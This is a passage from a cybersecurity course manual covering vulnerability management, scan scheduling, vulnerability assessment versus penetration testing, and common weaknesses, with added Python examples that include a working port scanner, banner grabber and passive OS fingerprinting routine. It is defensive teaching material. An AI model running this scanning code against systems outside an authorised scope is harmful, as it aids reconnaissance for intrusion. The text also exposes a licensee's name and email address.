could be in violation of an SLA, MOU, or other such agreement.

Vulnerability Management Documentation

Each step of the vulnerability management process, as well as the findings and outcomes that come
from each step, should be documented. This means recording each asset identified as part of the
inventory process; recording any vulnerabilities that are found; recording remediation techniques,
and so on. All of these things must be documented during each relevant step, not later or at the very
end of the process. That way, you can ensure you don't miss or forget to document some important
aspect of the environments under review.

In addition to documenting remediation techniques, you should also be prepared to document
exceptions. In some cases, an assessment may reveal a vulnerability that, for various reasons (like
those mentioned previously), you've decided not to remediate. For example, you might have a legacy
system that cannot function without some service that, on modern systems, would bring about
unacceptable risk. By documenting exceptions like these, you ensure that your remediation efforts
don't end up causing more problems than they solve.

To keep sensitive information from falling into unauthorized hands, you must take care to secure
your documentation at all times. This means not storing a digital form of the documentation on a
public repository or a private network share that is exposed to all personnel in an organization. In
some cases, you may want to encrypt the documentation and implement digital signatures to uphold
its confidentiality and integrity.
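The prioritization step described under Remediation and the documented exceptions described in this section, as an added Python example that is not part of the CertNexus course material; the scoring weights, hosts, finding identifiers, and the exception record are constructed assumptions, and the rescan comparison illustrates the Validation phase:

```python
"""Remediation triage, documented exceptions, and rescan validation.

Added example, not CertNexus course material. It ranks findings by asset
criticality, finding severity, and remediation difficulty, sets aside findings
covered by a documented (and time-limited) exception, and compares a rescan
with the earlier results. All hosts, findings, and identifiers are constructed.
"""
from dataclasses import dataclass
from datetime import date

# Weights are assumptions for this example; an organization would set its own.
ASSET_CRITICALITY = {"critical": 3.0, "important": 2.0, "non-critical": 1.0}
EFFORT_PENALTY = {"low": 0.0, "medium": 1.0, "high": 2.0}


@dataclass(frozen=True)
class Finding:
    finding_id: str   # constructed scanner identifier, not a real CVE
    host: str
    title: str
    severity: float   # scanner score on a 0.0 to 10.0 scale
    effort: str       # estimated remediation effort: low, medium, or high


@dataclass(frozen=True)
class Exception_:
    """A documented decision not to remediate, with a date on which it is reviewed."""
    host: str
    finding_id: str
    reason: str
    expires: date


def priority_score(finding, asset_class):
    """Higher means fix sooner: severity scaled by asset criticality, minus effort."""
    return round(finding.severity * ASSET_CRITICALITY[asset_class]
                 - EFFORT_PENALTY[finding.effort], 2)


def triage(findings, assets, exceptions, today):
    """Split findings into a ranked work list and those covered by a live exception.

    Returns (ranked, excepted): ranked is a list of (score, finding) in descending
    score order; excepted holds findings whose exception has not yet expired.
    """
    live = {(e.host, e.finding_id) for e in exceptions if e.expires >= today}
    ranked, excepted = [], []
    for f in findings:
        if (f.host, f.finding_id) in live:
            excepted.append(f)
        else:
            ranked.append((priority_score(f, assets[f.host]), f))
    ranked.sort(key=lambda pair: (-pair[0], pair[1].host, pair[1].finding_id))
    return ranked, excepted


def validate_remediation(before, after):
    """Compare a rescan with the earlier findings: resolved, still open, and new."""
    b = {(f.host, f.finding_id) for f in before}
    a = {(f.host, f.finding_id) for f in after}
    return {"resolved": sorted(b - a), "open": sorted(b & a), "new": sorted(a - b)}


# Constructed sample data
TODAY = date(2025, 6, 1)
ASSETS = {"db01": "critical", "web01": "important", "kiosk07": "non-critical"}
FINDINGS = [
    Finding("VULN-0001", "db01", "Outdated database service", 9.8, "medium"),
    Finding("VULN-0002", "web01", "TLS 1.0 enabled", 6.5, "low"),
    Finding("VULN-0003", "kiosk07", "Legacy file-sharing service", 7.5, "high"),
    Finding("VULN-0002", "db01", "TLS 1.0 enabled", 6.5, "low"),
]
EXCEPTIONS = [
    Exception_("kiosk07", "VULN-0003",
               "legacy application cannot run without the service; host is isolated",
               date(2025, 12, 31)),
]
RESCAN = [  # constructed results after the db01 fixes were applied
    Finding("VULN-0002", "web01", "TLS 1.0 enabled", 6.5, "low"),
    Finding("VULN-0003", "kiosk07", "Legacy file-sharing service", 7.5, "high"),
    Finding("VULN-0004", "db01", "Missing OS security update", 8.1, "low"),
]

if __name__ == "__main__":
    ranked, excepted = triage(FINDINGS, ASSETS, EXCEPTIONS, TODAY)
    for score, f in ranked:
        print(f"{score:5.1f}  {f.host:<8} {f.finding_id}  {f.title}")
    for f in excepted:
        print(f"EXCPT  {f.host:<8} {f.finding_id}  {f.title}")
    print(validate_remediation(FINDINGS, RESCAN))
```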
at

Ongoing Scanning

Vulnerability management is not a linear process, but a cyclical one. The ever-changing threat and
technological landscape enables attackers to develop novel ways of compromising an organization.
That's why your vulnerability management program needs to conduct regular, ongoing scans as part
of the organization's wider continuous monitoring efforts.

Ideally, you'd be able to scan as often as you want, but the security team is not allocated infinite time
and resources, and it may be under certain technical constraints. Additionally, you need to consider
the possibility that certain scans will disrupt the services that hardware and software systems provide.
Whereas some techniques have a negligible impact on performance, others may add significant
overhead to computing and network resources.
ot

Scanning Frequency

You need to consider multiple factors when it comes to choosing a scanning frequency. Just like
with requirements identification, the laws and regulations your organization is subject to may be
critical drivers. Some sources of external compliance may outright dictate a scanning frequency that
your organization must follow; others take a more hands-off approach and simply require that you
have a plan in place to scan at certain intervals. Likewise, your scanning frequency will depend on
internal risk-based compliance. If you determine you have a large risk appetite for a certain system
or function of the business, you may choose to scan less frequently, and vice versa.

Your workflow may be another factor that affects your scanning frequency. For example, running a
simple port scan on a small number of hosts in your environment may take just a few minutes and
won't be too taxing; therefore, you may want to run such a scan at least once a day, preferably
when the hosts are not being used during business hours. On the other hand, a deep and thorough
vulnerability scan of all hardware and software objects could take several hours and be a drain on
resources, so you may want to run this scan once a week or once a month on the weekends.

Another driver of scanning frequency is the rate at which changes are made to the systems within
the assessment scope. If a system is patched or reconfigured often, the standard scanning frequency
may not be sufficient. You may need to scan said systems more often to keep up with the rate at
which vulnerabilities accumulate.

Guidelines for Implementing a Vulnerability Management Plan

Use the following guidelines when implementing a vulnerability management plan.

Implement a Vulnerability Management Plan

When implementing a vulnerability management plan:
• Take inventory of all assets in the organization, including both hardware and software assets.
• Consider how regulatory requirements may drive your vulnerability assessments.
• Consider how policies, like data classification, may inform what assets you assess and how you
assess them.
• Ensure that you can answer various questions about assessment execution, such as who will carry
out the assessment and when.
• Ensure that your assessment tools are generating actionable reports.
• Consider how you will distribute these reports to the proper stakeholders.
• Establish a remediation process for addressing vulnerabilities found during assessments.
• Prioritize remediation efforts to tackle the most critical vulnerabilities or assets.
• Plan remediation efforts around change control processes.
• Consider that there are several factors that could inhibit your remediation efforts, like the risk of
service interruption.
• Document each step of the vulnerability management process as it occurs.
• Incorporate ongoing scanning into your continuous monitoring program.
• Establish a frequency for ongoing scans based on ease of implementation and how the scans fit
into your employees' workflow.

ACTIVITY 6-2
Implementing a Vulnerability Management Plan

Before You Begin
You'll use your Windows 10 computer in this activity.

Scenario
Up until now, Develetech has been addressing vulnerabilities reactively—every time a major security
alert is issued by an external source, the organization scans a few of its systems for flaws. However,
you know this kind of approach is not sufficient if the organization wants to truly mitigate risk. You
suggest that your team develop a comprehensive vulnerability management plan so that Develetech
is more proactive about fixing its security issues.

1. On your Microsoft® Windows® 10 computer, open a web browser and navigate to
https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf.

Note: If you're redirected to the document library, select the PCI DSS link and
accept the licensing agreement. Select the link again, and if you're prompted to
fill out a form, select No Thanks.

2. Navigate to page 96 ("Requirement 11: Regularly test security systems and processes").

3. This section of the PCI DSS outlines requirements for vulnerability scans.
According to these requirements, what are some of the behaviors that
Develetech must incorporate into its vulnerability management program?

A: Answers may vary, as there are several requirements that PCI DSS outlines for the organization.
Some examples include: the organization must scan for all wireless access points (WAPs) in its
environments at least once every three months; the organization must run a vulnerability scan
after a significant change to its network (e.g., its topology changes); the organization must allow
an external vulnerability assessment agency validated by PCI DSS to scan environments every
three months; the organization must have a monitoring process in place for detecting changes to
critical files; and more.

4. Develetech has a small division within the company that provides cloud-based
virtual server usage to customers in an Infrastructure as a Service (IaaS)
platform. Develetech signs off on an SLA for each customer, promising that it
will deliver 99.99% uptime with limited latency. In order to keep these virtual
systems secure, you run vulnerability assessments on them periodically. The
latest scan reveals a major vulnerability that will require a quick security patch
to fix.

How could the nature of this cloud platform business inhibit Develetech from
remediating this problem?

A: Answers may vary, but Develetech needs to consider the impact of putting the security patch in
place. If the company simply propagates the fix to all production environments at once, there will
likely be processing and networking bottlenecks that cause delays or may even lead to a
disruption of service. If this is in direct violation of the SLA, Develetech may be subject to legal
action. The vulnerability management plan needs to account for the impacts of remediation with
regard to the company's various business arrangements.

5. You want to run a thorough and comprehensive vulnerability scan of all critical
production systems once a week, and a quicker port scan of those same
systems every other day.

What factors influence your decision to conduct these two scans at different
frequencies?

A: Answers may vary. The comprehensive vulnerability scan is likely to be a bigger drain on network
and computing resources, so it wouldn't necessarily be feasible to conduct this scan every day.
On the other hand, the port scan is less disruptive, so it makes more sense to conduct it more
frequently. Time is also a factor—the comprehensive scan could take several hours, or even days,
while the port scan may take just a few minutes. Another factor to consider is employee workflow.
Starting the comprehensive scan in the middle of a weekday is not the best choice, as the chance
of interrupting business is at its highest. Performing either scan after business hours or on the
weekend is usually the best approach.

TOPIC C
Assess Vulnerabilities
Now that you've established a plan for managing vulnerabilities, you can start assessing those
vulnerabilities directly.

Vulnerability Assessment

A vulnerability assessment is an evaluation of a system's security and ability to meet compliance
requirements based on the configuration state of the system, as represented by information collected
from the system.

Essentially, the vulnerability assessment determines if the current configuration matches the ideal
configuration. Before beginning the assessment process in earnest, you should first establish the
scope of the assessment so that it supports your compliance requirements without exceeding them.

The process consists of the following steps:
1. Collect a predetermined set of target attributes (such as specific parameters or rules for a
firewall).
2. Store the collected sample for reference.
3. Organize the data to prepare it for analysis and comparison.
4. Analyze and document the differences between the current configuration and the baseline.
5. Report on the results.

Although this process could be conducted manually, vulnerability assessments are typically
accomplished through automated vulnerability assessment tools, which examine an organization's
systems, applications, and devices to determine their current state of operation and the effectiveness
of any security controls. Typical results from a vulnerability assessment will identify
misconfigurations and missing security patches or critical updates.

Perform vulnerability assessments when:
• You first deploy new or updated systems, which provides a baseline of the systems' security
configurations.
• New vulnerabilities have been identified through penetration tests, or based on general
information from vendors, a vulnerabilities database, or other sources. A vulnerability assessment
can reveal systems that are subject to the vulnerabilities and where you need to focus your
remediation efforts.
• A security breach occurs, as the vulnerability assessment can help you identify possible attack
vectors and determine whether they have been exploited.
• You need to document the security state of systems. For example, you may be required to
do this to satisfy a regulatory audit or other oversight requirements.

Penetration Testing

A penetration test, or pen test, uses active tools and security utilities to evaluate security by
executing an authorized attack on a system. A penetration test will verify a threat exists, then it will
actively test and bypass security controls, and finally it will exploit vulnerabilities on the system. Such
vulnerabilities may be the result of poorly or improperly configured systems, known or unknown
hardware or software flaws, or operational weaknesses in processes or technical countermeasures.
Any security issues found in the test that can be exploited are presented to the organization with an
assessment of the impact and a remediation proposal.

Note: Penetration testing is introduced here so students understand how vulnerability assessments
are different.

Penetration tests are less common and more intrusive than basic vulnerability assessments.
Penetration tests tend to be driven by an organization's desire to determine the feasibility of an
attack and the amount of business impact a successful exploitation of vulnerabilities will have on an
organization. One major difference between penetration testing and typical vulnerability assessments
is that the rating assigned to a vulnerability during a vulnerability assessment is subjective, whereas a
penetration test will exploit a real vulnerability to test it. Penetration testing also tends to combine
multiple vulnerabilities together to provide a more holistic understanding of an organization's
vulnerability state.

It is important that penetration testing follows a method similar to what a real attacker would use,
including phases in which the attacker prepares and learns what they can about the target. The
difference between the execution of a real attack and a penetration test is that of intent, and you
should have the explicit permission of the target organization before you begin the test. You should
make sure the organization is aware the test should not stop until the attack has been fully carried
out. Otherwise, the results of the test could be skewed or the live systems themselves may be
damaged.

Note: Consider asking students if they have any experience with a penetration test causing
real-world damage.

Lesson 6: Assessing the Organization's Security Posture | Topic C

ib
Vulnerability Assessment vs. Penetration Testing

Vulnerability assessment and penetration testing are related in that both are used to assess systems in
light of the organization's security posture, but they have different purposes. Unfortunately, the
terms are often confused. For example, you may hear someone use the term "penetration test" to
describe a vulnerability assessment. In any conversation where the distinction matters, you might ask
the person to clarify what they mean.

The following table compares a vulnerability assessment with a penetration test.

Attribute of the Process: Focus
  Vulnerability Assessment: Specific known technical vulnerabilities.
  Penetration Testing:
  • Specific known technical vulnerabilities.
  • Multiple known technical vulnerabilities (stacked, in combination).
  • Unknown technical vulnerabilities.
  • Non-technical vulnerabilities, such as social engineering and physical controls.

Attribute of the Process: Degree of human control
  Vulnerability Assessment: Largely automated, using scanning tools.
  Penetration Testing: Largely manual, supplemented with automated tools, but driven in part by
  human intuition, which is difficult to simulate or automate.

Attribute of the Process: Disruption to system operations
  Vulnerability Assessment: Minimal, since most of the focus is on data collection.
  Penetration Testing: Potentially significant, since exploits such as distributed denial of service
  (DDoS) attacks may be conducted.

Attribute of the Process: Frequency and duration
  Vulnerability Assessment: Performed frequently and monitored on an ongoing basis.
  Penetration Testing: Expensive, time consuming, and potentially disruptive, so not performed on
  a frequent basis.

Attribute of the Process: Personnel who perform it
  Vulnerability Assessment: Typically internal personnel.
  Penetration Testing: Internal or external; often a combination of both.

Attribute of the Process: Cost
  Vulnerability Assessment: Typically a minimal ongoing cost based on frequent scans.
  Penetration Testing: Typically a larger cost on an individual basis.

Vulnerability Assessment Implementation

To implement vulnerability assessment tools and techniques:
1. Install the assessment software on the systems per the implementation plan. If necessary, run
suitable patches to ensure the latest version of the tool is implemented.
2. Study the assessment software's help manual. Enable options that will keep the software
automatically updated. Register the software to receive its full benefits.
3. Perform an initial assessment of the system.
4. Save the initial assessment results as the baseline.
5. Analyze the assessment reports.
6. Take suitable corrective actions based on the reported findings.
7. Perform the assessment again.
8. Save the results and compare them with the baseline assessment results.
9. Document your findings and prepare suitable reports to present to upper management.
10. Perform ongoing assessments on all systems in your organization.
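The five assessment steps from the start of this topic (collect, store, organize, analyze, report) and the save-the-baseline-and-compare routine of steps 4 and 8 above, carried through as an added Python example that is not course material; the configuration format, host settings, and firewall rules are constructed for illustration:

```python
"""Configuration baseline assessment.

Added example, not CertNexus course material. It walks a constructed firewall
configuration through the five assessment steps: collect the target attributes,
store the sample, organize it, analyze differences from the baseline, and
report. The "key=value" / "rule <action> <proto> <port>" format is made up.
"""
import json
import tempfile
from pathlib import Path

# Constructed samples: the approved baseline and what the firewall reports today.
BASELINE_TEXT = """\
# approved configuration for the perimeter firewall (constructed)
default_policy=deny
logging=on
rule allow tcp 443
rule allow tcp 22
rule deny tcp 23
"""
CURRENT_TEXT = """\
default_policy=deny
logging=off
rule allow tcp 443
rule allow tcp 22
rule allow tcp 3389
"""


def collect(raw_text):
    """Step 1: collect the predetermined attributes (settings and rules) from the target."""
    settings, rules = {}, set()
    for line in raw_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("rule "):
            _, action, proto, port = line.split()
            rules.add((action, proto, int(port)))
        else:
            key, _, value = line.partition("=")
            settings[key.strip()] = value.strip()
    return {"settings": settings, "rules": rules}


def organize(sample):
    """Step 3: canonical, JSON-friendly form so any two samples compare deterministically."""
    return {"settings": dict(sorted(sample["settings"].items())),
            "rules": sorted(list(r) for r in sample["rules"])}


def store(sample, path):
    """Step 2: keep the collected sample for reference (as the baseline or a later rescan)."""
    path.write_text(json.dumps(organize(sample), indent=2))


def load(path):
    """Read back a stored sample; organize() accepts it as-is."""
    return json.loads(path.read_text())


def analyze(baseline, current):
    """Step 4: differences between the current configuration and the baseline."""
    b, c = organize(baseline), organize(current)
    b_rules = {tuple(r) for r in b["rules"]}
    c_rules = {tuple(r) for r in c["rules"]}
    keys = set(b["settings"]) | set(c["settings"])
    changed = {k: (b["settings"].get(k), c["settings"].get(k))
               for k in keys if b["settings"].get(k) != c["settings"].get(k)}
    return {"missing_rules": sorted(b_rules - c_rules),
            "unexpected_rules": sorted(c_rules - b_rules),
            "changed_settings": changed}


def report(diff):
    """Step 5: one line per deviation, preceded by an overall verdict."""
    lines = []
    for action, proto, port in diff["missing_rules"]:
        lines.append(f"MISSING    rule {action} {proto} {port} (in baseline, absent on system)")
    for action, proto, port in diff["unexpected_rules"]:
        lines.append(f"UNEXPECTED rule {action} {proto} {port} (on system, not in baseline)")
    for key, (old, new) in sorted(diff["changed_settings"].items()):
        lines.append(f"CHANGED    {key}: baseline={old!r} current={new!r}")
    verdict = ("PASS: configuration matches baseline" if not lines
               else f"FAIL: {len(lines)} deviation(s) from baseline")
    return [verdict] + lines


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        baseline_file = Path(tmp) / "baseline.json"
        store(collect(BASELINE_TEXT), baseline_file)            # save the baseline
        diff = analyze(load(baseline_file), collect(CURRENT_TEXT))  # compare the rescan
        print("\n".join(report(diff)))
```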

ib
Tools Used in Vulnerability Assessment

tr
Tools Used in Many software tools support vulnerability assessments. You can find tools to detect a wide range of
Vulnerability vulnerabilities and specific hard-to-detect vulnerabilities. By running these tools, you can see exactly

is
Assessment (2 Slides) what potential attackers would see if they assessed your systems. However, their usefulness to you is
dependent on how well you can interpret the results of security assessment tools. When you become

D
acquainted with what to expect and what to look out for in a tool's results, it will be easier for you to
remove any vulnerabilities in your system.
The following table lists some of the available vulnerability assessment tools.

Vulnerability
Assessment Tool
Description or
e
Vulnerability scanner Identifies and reports on known weaknesses found in devices,
applications, and systems residing on a network. A vulnerability scanner
at

can use a number of different assessment techniques to detect flaws, and


each scanner may target only specific technologies. Because they rely on a
lic

prior knowledge of vulnerabilities, these scanners may be ill equipped to


assess new and emerging weaknesses.
Port scanner A device or application that scans a network to identify what devices are
up

reachable (alive), what ports on these devices are active, and what
protocols these active ports use to communicate. A port scanner typically
relies on the most common network protocols (for example,
Transmission Control Protocol [TCP], User Datagram Protocol [UDP],
D

and Internet Control Message Protocol [ICMP]) to retrieve this


information. The port information revealed in a scan can help you
pinpoint vulnerabilities in your network, as attackers will often use open
ot

ports as an intrusion vector.


Protocol analyzer Decodes and analyzes the traffic sent over a network communication
N

session. By presenting the conversation to the end user in an easily


understood manner, this decode process simplifies the interpretation of
the protocols used in the traffic. Protocol analyzers are useful for
o

diagnosing network connectivity issues, detecting anomalous network


behavior, and gathering traffic statistics that can be used to assess which
D

protocols are most vulnerable in a network.


Packet analyzer Captures and decodes the actual content of particular network packets
sent using various network protocols. This can be useful for filtering
certain packets to keep them from communicating across the network, as
well as verifying that security controls, like firewalls, are working as
intended.

Lesson 6: Assessing the Organization's Security Posture | Topic C


Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 241

Vulnerability Description
Assessment Tool
Network enumerator Gathers information on users, groups, and services on a network without
authenticating to the device. Network enumerators often use protocols
like ICMP and Simple Network Management Protocol (SNMP) to
discover network hosts and retrieve the information.
Password cracker Used to recover secret passwords from data stored or transmitted by a
computer.

e
Fuzzer Sends an application random input data to see if it will crash or expose a

ut
vulnerability. These tools can be useful in detecting any faults that will
expose sensitive information in an application, and especially in web apps.

ib
HTTP interceptor An application or device used to read HTTP communications or web
traffic.

tr
Exploitation Provides a consistent and reliable environment to create and execute
framework exploit code against a target.

is
Intelligence gatherer Gathers information regarding a target organization before actually
conducting the attack for the purpose of discovering key information and

D
vulnerabilities without being detected. Methods include taking advantage
of people exposing too much on social media sites, using the Whois
domain lookup to retrieve Internet registration information, and mapping

Port Scanning
a network's topology.
or
e
ICMP is typically used by a port scanner to perform the preliminary check to determine what Port Scanning
at

devices on the network are alive and responding before a real port scan is carried out. This is done
for optimization reasons, as a full port scan of all 65,535 ports for both the UDP and TCP protocols
can be time consuming. By checking if the device is alive and responding using ICMP discovery, you
lic

can reduce the overall length of time it takes to port scan a large network. Take caution when using
this default setting, as devices can be configured to not respond to ICMP echo requests and will be
skipped by the port scanner.
Figure 6-5: The results of a port scan.
Fingerprinting

Fingerprinting is the technique of determining the type of operating system and services a target uses by studying the types of packets, and the characteristics of those packets, exchanged during a communication session. Fingerprinting typically relies on details of the target's TCP/IP implementation to provide this information. There are two types of fingerprinting: active fingerprinting and passive fingerprinting.
Active fingerprinting is performed with a scanning tool that sends specifically crafted packets and examines the responses to determine the operating system version and service-related information. For example, an assessor may simply establish a Telnet session or open a socket connection to an open port and observe the response (banner grabbing). Web servers and mail servers are notorious for responding with operating system and application version information in the initial response header or greeting.
Passive fingerprinting attempts to learn about a targeted service without the target knowing it. Passive fingerprinting is a form of packet sniffing, in that the packets are captured during normal communications with the service and then examined for specific characteristics and oddities. Every operating system's IP stack has its own idiosyncrasies, such as its initial TTL value, default TCP window size, and the order of TCP options, because it is up to the IP stack developer to decide how certain protocol fields are set and handled.
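The port scanning and fingerprinting steps described above, as an added example that is not part of this course's materials: a TCP connect() scan against a small port range with ICMP host discovery deliberately skipped, banner grabbing as active fingerprinting, and a simplified passive OS guess from a captured SYN's TTL, window size, and DF bit. The loopback demo server and its Apache banner are constructed targets, and the TTL/window defaults are a handful of common values, not a real fingerprint database.

```python
"""Added example, not part of the CFR-410 course: a TCP connect() scan
without ICMP host discovery, banner grabbing for active fingerprinting,
and a simplified passive OS guess from captured header values. The demo
server, banner, and the TTL/window defaults used are constructed or
simplified for illustration."""
import re
import socket
import threading
from typing import Dict, Iterable, Optional

# Constructed banner in the style web servers leak on first contact.
DEMO_BANNER = b"HTTP/1.0 200 OK\r\nServer: Apache/2.4.29 (Ubuntu)\r\n\r\n"
SERVER_RE = re.compile(rb"^Server:\s*(.+?)\r?$", re.MULTILINE | re.IGNORECASE)


def start_demo_server() -> int:
    """Constructed target: listen on an ephemeral loopback port and answer
    each connection with DEMO_BANNER once the client has sent something."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve() -> None:
        while True:
            conn, _ = srv.accept()
            with conn:
                conn.settimeout(1.0)
                try:
                    conn.recv(1024)  # wait for the scanner's probe
                except socket.timeout:
                    pass
                conn.sendall(DEMO_BANNER)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def connect_scan(host: str, ports: Iterable[int], timeout: float = 0.5) -> Dict[int, bool]:
    """Full TCP handshake per port; a completed connect() means open.
    No ICMP ping sweep is done first, so a host that drops echo requests
    is still probed (the equivalent of Nmap's -Pn)."""
    results: Dict[int, bool] = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            results[port] = s.connect_ex((host, port)) == 0
    return results


def grab_banner(host: str, port: int, timeout: float = 1.0) -> bytes:
    """Active fingerprinting: connect, send a harmless HTTP HEAD, and read
    whatever the service volunteers (many services announce themselves)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""


def extract_product_string(banner: bytes) -> Optional[str]:
    """Pull the identifying text out of a banner: the Server header for
    HTTP, otherwise the greeting line (SSH and SMTP lead with one)."""
    if banner.startswith(b"HTTP/"):
        m = SERVER_RE.search(banner)
        return m.group(1).decode(errors="replace").strip() if m else None
    first = banner.split(b"\r\n", 1)[0].strip()
    return first.decode(errors="replace") or None


def passive_os_guess(ttl: int, window: int, df: bool) -> str:
    """Passive fingerprinting from a captured SYN. Initial TTL, default TCP
    window, and the Don't Fragment bit vary by IP stack; the values here
    are common defaults, far fewer than a real tool such as p0f uses."""
    initial_ttl = next((t for t in (64, 128, 255) if ttl <= t), 255)  # undo hops
    if initial_ttl == 128 and window in (8192, 65535) and df:
        return "Windows"
    if initial_ttl == 64 and window in (5840, 14600, 29200, 64240) and df:
        return "Linux"
    if initial_ttl == 255 and window == 4128:
        return "Cisco IOS"
    return "unknown"


def demo() -> Dict[str, object]:
    """Scan a small range around the constructed target and fingerprint
    whatever is open."""
    port = start_demo_server()
    scan = connect_scan("127.0.0.1", range(port - 2, port + 3))
    open_ports = [p for p, up in scan.items() if up]
    banners = {p: extract_product_string(grab_banner("127.0.0.1", p)) for p in open_ports}
    return {"open_ports": open_ports, "banners": banners}


if __name__ == "__main__":
    print(demo())
    print(passive_os_guess(ttl=126, window=8192, df=True))
```

Run it as a script to see the constructed target appear in open_ports with its Server header; point connect_scan and grab_banner at an in-scope host to use them for real. The passive guess is deliberately crude: a tuned stack or a middlebox that rewrites TTLs will defeat it, which is why the text pairs passive observation with active probing.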

Networking Vulnerabilities

Note: The following vulnerability lists are not exhaustive; they merely point out a few common examples.

The following is a list of some common vulnerabilities in network infrastructure and appliances:
• Lack of network segmentation: A network infrastructure that isn't divided into subnets or zones may end up being a single point of compromise for an attacker's benefit. If the attacker breaches the network, they may have access to all nodes, rather than just the nodes in their segment. Poorly segmented networks also present a problem when the incident response team tries to contain worms and other fast-spreading malware.
• Insufficient security of interconnected networks: Some organizations or divisions within an organization run networks that are independent, yet offer some measure of integration. Even if one network has robust security, it can still be contaminated by the other network if the other network is insecure.
• Insecure authentication used in virtual private networks (VPNs): Some VPNs offer the Microsoft Challenge-Handshake Authentication Protocol (MS-CHAP) as an option, but this protocol has several known weaknesses. Attackers who capture the handshake may be able to crack or brute force the authentication exchange offline and gain access to the network from the outside.
• Poorly configured endpoints: Since endpoints are the gatekeepers of your network, an attacker who is able to breach their defenses can find a way into the network. Endpoint vulnerabilities tend to result from weak or non-existent anti-malware solutions and insufficient access control.
• Sensitive data transmitted across the network in plaintext: If an attacker gains access to the network, they may be able to sniff traffic on their network segment and inspect each packet for useful data. This process is much more lucrative to an attacker when no transport encryption is in use.
• Poorly secured network appliances: Switches can be overloaded in a DoS attack if they fail to incorporate loop protection and flood guards. Routers may fail to drop network packets from spoofed or unknown sources if not configured properly. Firewalls may not adequately filter inbound traffic if they do not adhere to the principle of implicit deny. Any of these appliances may also be placed incorrectly within the logical or physical topology of the network, leading to sub-optimal performance and gaps in coverage.
• Poorly secured wireless access points (WAPs) and wireless routers: WAPs and routers whose management consoles are still configured with default credentials can be breached by an attacker within range of the signal. Even if the management console is secured, certain wireless protocols are obsolete and easily broken: Wired Equivalent Privacy (WEP) encryption can be cracked in minutes, and Wi-Fi Protected Setup (WPS) PINs can be brute forced to recover the network passphrase.
• Flaws in network infrastructure and services: Vulnerabilities in network services like digital subscriber line (DSL) can impact your infrastructure. For example, certain DSL modems have been shown to be vulnerable to command injection and information leakage exploits that enable attackers to take over the modem for use in a botnet. IP addressing is also a potential flaw in the network infrastructure if IP address management (IPAM) practices are not properly implemented, or if IPv6 traffic flows across a network whose monitoring and filtering were designed only for IPv4, and vice versa.
• Insufficient monitoring and alerting capabilities: Without event monitors positioned at key points within the network, attempted or successful attacks will go unnoticed by the organization. Alerts without context can also confuse security analysts and make it difficult for them to identify the problem and take action.

Host Vulnerabilities

The following is a list of some common vulnerabilities in hosts and the operating systems they run:
• Unnecessary services running on servers: Because servers are such important devices in any organizational environment, they are some of the most common targets of attacks. A server with too many running services has a larger attack surface, and consequently a greater risk of compromise.
• Misconfigured access control mechanisms: Default passwords, active guest accounts, active accounts from former employees, and poorly managed privileges can easily lead to an attacker gaining access to a device. Additionally, access control mechanisms that don't follow an organization's policy may fail to support business objectives, being either too restrictive for authorized entities or too permissive toward unauthorized ones.
• Changes to the system: Most systems need to change in some way, whether it's adding software, changing system configuration, storing data, and so on. If these changes are not tracked and managed, it will be more difficult to detect the ways in which they leave the system vulnerable.
• Weak at-rest encryption: Sensitive information must be kept confidential, which almost always requires some sort of encryption. If devices use obsolete encryption algorithms and schemes, like the Data Encryption Standard (DES) for symmetrically encrypting data, then the confidentiality of the information is vulnerable to compromise.
• No bring your own device (BYOD) plan: Without a plan to incorporate the BYOD phenomenon in your organization, employees' mobile devices may pose a serious risk to the rest of your network and systems. You have little to no control over employees' personal devices outside the organization, which means you can't prevent these devices from being compromised and then introducing threats into your environment.
• Lack of effective anti-malware tools: While common anti-malware solutions are far from perfect, they are still effective at detecting and removing many strains of malware. Administrators and users often fail to install these solutions on their devices, or they fail to enable real-time scanning features.
• Unpatched operating systems: Without a plan for issuing security fixes to affected systems, those systems will remain vulnerable to a variety of potential threats.
• Poor physical security: No amount of hardening will keep a device secure if someone can just walk into an office and steal it. Attackers may also be able to damage or tamper with devices if they aren't properly locked up and behind layers of physical access control.

IoT Vulnerabilities

Internet of Things (IoT) devices are vulnerable to much the same types of attacks as other computing devices. However, it tends to be easier to exploit these vulnerabilities because of how insecure many such devices are by design and operation. For example, many IoT devices don't force the user to change the default access credentials, and in some cases hard-code those credentials so they cannot be changed. Because they are connected to the Internet, these devices are easily discoverable online and are attractive targets to attackers. Likewise, IoT devices are limited in processing power and may be unable to incorporate security functionality, like encryption, that consumes a significant amount of resources.

Note: An easy way to discover insecure IoT devices is to use Shodan (https://www.shodan.io/), a search engine that crawls the Internet for connected devices such as IP cameras, network appliances, industrial control systems, and more.
Application Vulnerabilities

The following is a list of some common vulnerabilities in applications:
• Improper input handling: Poorly handled input in applications can lead to unauthorized users gaining access to a system or additional privileges. In other cases, the input may disrupt the system and cause a denial of service.
• Improper error handling: Applications may reveal too much information about how the app functions in error messages, which can help an attacker with their reconnaissance efforts. Errors also become a security issue when the app can't handle them gracefully, for example when it ends up consuming too many system resources and becomes unstable.
• Weak cryptographic implementations: As with operating systems, an application that uses weak ciphers or weak implementations of cryptography puts the sensitive data it works with at risk. For example, an app that uses the Message Digest 5 (MD5) algorithm to hash passwords is insecure, because MD5 is fast enough to brute force and has no built-in salting or work factor.
• Memory vulnerabilities: There are many memory-based vulnerabilities, such as memory leaks and buffer overflows. Most such vulnerabilities lead to system instability, and some can even enable an attacker to inject malicious code into an area of memory to gain control of a system or read sensitive data.
• Flaws in network management software: Networking software is meant to streamline and optimize network operations and management, but flaws in these tools can have the opposite effect on the network as a whole. For instance, a network management platform that doesn't integrate properly with your unique environment can lead to network delays and bandwidth issues, and may even violate security policy.
